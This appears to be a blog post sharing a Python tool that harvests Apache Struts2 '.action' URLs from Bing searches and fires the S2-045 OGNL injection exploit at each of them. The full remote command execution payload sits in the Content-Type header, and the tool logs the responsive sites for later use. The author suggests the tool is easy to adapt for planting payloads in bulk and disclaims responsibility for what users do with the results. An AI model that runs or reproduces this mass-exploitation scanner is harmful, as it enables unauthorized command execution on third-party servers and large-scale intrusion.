Tonight I watched the folks in the group chat having a heated discussion about this S2-045 vulnerability. Personally I'm not much into popping sites. I originally thought about writing something to plant payloads in bulk, but decided against it; if you're interested, it's easy enough to modify, and either way that's none of my business.
[Test screenshot]

Installing the dependencies:

pip install requests
pip install beautifulsoup4

(The script imports bs4, so the package you want is beautifulsoup4, not the old beautifulsoup.)
The directory the script lives in must contain a keyword.txt holding the keywords, one per line.
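For example, a keyword.txt could look like this (placeholder entries; the real keywords ship in the package below). The script numbers them from 0 in file order:

first keyword
second keyword
third keyword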
At first I planned to read in all the keywords and run through them one by one, but that felt like it would take far too long to test. Then I changed it so you type the keyword in yourself, but that seemed like too much hassle. So it ended up the way it is now: the script reads the keywords, numbers them, and you just enter the index.
Along the way I ran into sites that refused the connection outright and crashed the script, and others that hung without ever returning a response; both cases are handled now. My own test results were decent. Hits are saved to a txt file, and whatever you do with them after that is none of my business either.
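Both problems boil down to the same fix: give every request a timeout and wrap it in a try/except. A minimal sketch of the pattern (probe and the URL here are just placeholders, not names from the script):

import requests

def probe(url):
    try:
        # hard 10-second timeout so dead hosts can't stall the whole run
        resp = requests.get(url, timeout=10)
    except requests.exceptions.RequestException:
        # covers refused connections, timeouts, DNS failures and the like
        return None
    return resp.status_code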
Notes

Example:
python s2-045.py 9 10
The first argument is the script filename itself, the second is the index of the keyword to search with, and the third is the number of result pages to crawl.
For the mapping between indexes and keywords, just run python s2-045.py with no arguments to see the help.
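With no arguments, the output looks roughly like this (illustrative; the keyword list is whatever your keyword.txt contains):

usage : python s2-045.py 0 10
first parameter is your filename
second parameter is your keyword's number which will be used by Bing
Third parameter is the page number you want to crawl

0 is first keyword
1 is second keyword
...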
The script uses the Bing search engine; the files are packaged below.
Here's the code (it works on both Python 2 and 3):

# encoding:utf-8
import sys
import requests
from bs4 import BeautifulSoup

# read keyword.txt and number the keywords from 0, one per line
keyword = {}
with open("keyword.txt") as f:
    i = 0
    for keywordLine in f:
        keyword[str(i)] = keywordLine.strip()  # strip the trailing newline
        i += 1

usage = '''
usage : python s2-045.py 0 10
first parameter is your filename
second parameter is your keyword's number which will be used by Bing
Third parameter is the page number you want to crawl\n'''

def poc(actionURL):
    # minimal multipart body; the actual payload rides in the Content-Type header
    data = '--447635f88b584ab6b8d9c17d04d79918\
Content-Disposition: form-data; name="image1"\
Content-Type: text/plain; charset=utf-8\
\
x\
--447635f88b584ab6b8d9c17d04d79918--'
    header = {
        "Content-Length" : "155",
        "User-Agent" : "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
        "Content-Type" : "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
    }
    try:
        request = requests.post(actionURL, data=data, headers=header, timeout=10)
    except requests.exceptions.RequestException:
        # connection refused, timeout, and so on
        return "Refused"
    return request.status_code

def returnURLList():
    keywordsBaseURL = 'http://cn.bing.com/search?q=' + keyword[sys.argv[1]] + '&first='
    n = 0
    i = 1
    while n < int(sys.argv[2]):
        baseURL = keywordsBaseURL + str(i)
        # advance the paging counters first so a failed page can't loop forever
        i += 10
        n += 1
        try:
            req = requests.get(baseURL)
            soup = BeautifulSoup(req.text, "html.parser")
            # Bing result links live under li.b_algo > h2 > a
            text = soup.select('li.b_algo > h2 > a')
            # keep only .action URLs, truncated right after 'action'
            standardURL = [url['href'][:url['href'].index('action')] + 'action' for url in text if 'action' in url['href']]
        except Exception:
            print("HTTPERROR")
            continue
        yield standardURL

def main():
    if len(sys.argv) != 3:
        # wrong argument count: print the help plus the index of every keyword
        print(usage)
        for k, v in keyword.items():
            print("%s is %s" % (k, v))
        sys.exit()
    for urlList in returnURLList():
        for actionURL in urlList:
            code = poc(actionURL)
            print(str(code) + '----' + actionURL + '\n')
            if code == 200:
                # responsive targets are appended to AvailableURL.txt
                with open("AvailableURL.txt", "a") as f:
                    f.write(actionURL + '\n')

if __name__ == '__main__':
    main()
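One line worth unpacking is the list comprehension that normalizes the search results: it cuts each result link off right after the first occurrence of 'action', dropping query strings and anchors. A quick illustration (the URL is made up):

href = 'http://example.com/login.action?from=bing'
trimmed = href[:href.index('action')] + 'action'
# trimmed == 'http://example.com/login.action'

Note it truncates at the first 'action' anywhere in the URL, so a link such as '/actions/list.do' would get mangled; good enough for a quick sweep, though.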
Download link

I've also packaged a Windows build you can run directly, e.g. s2-045.exe 9 10 from the exe's directory; other usage is the same as above.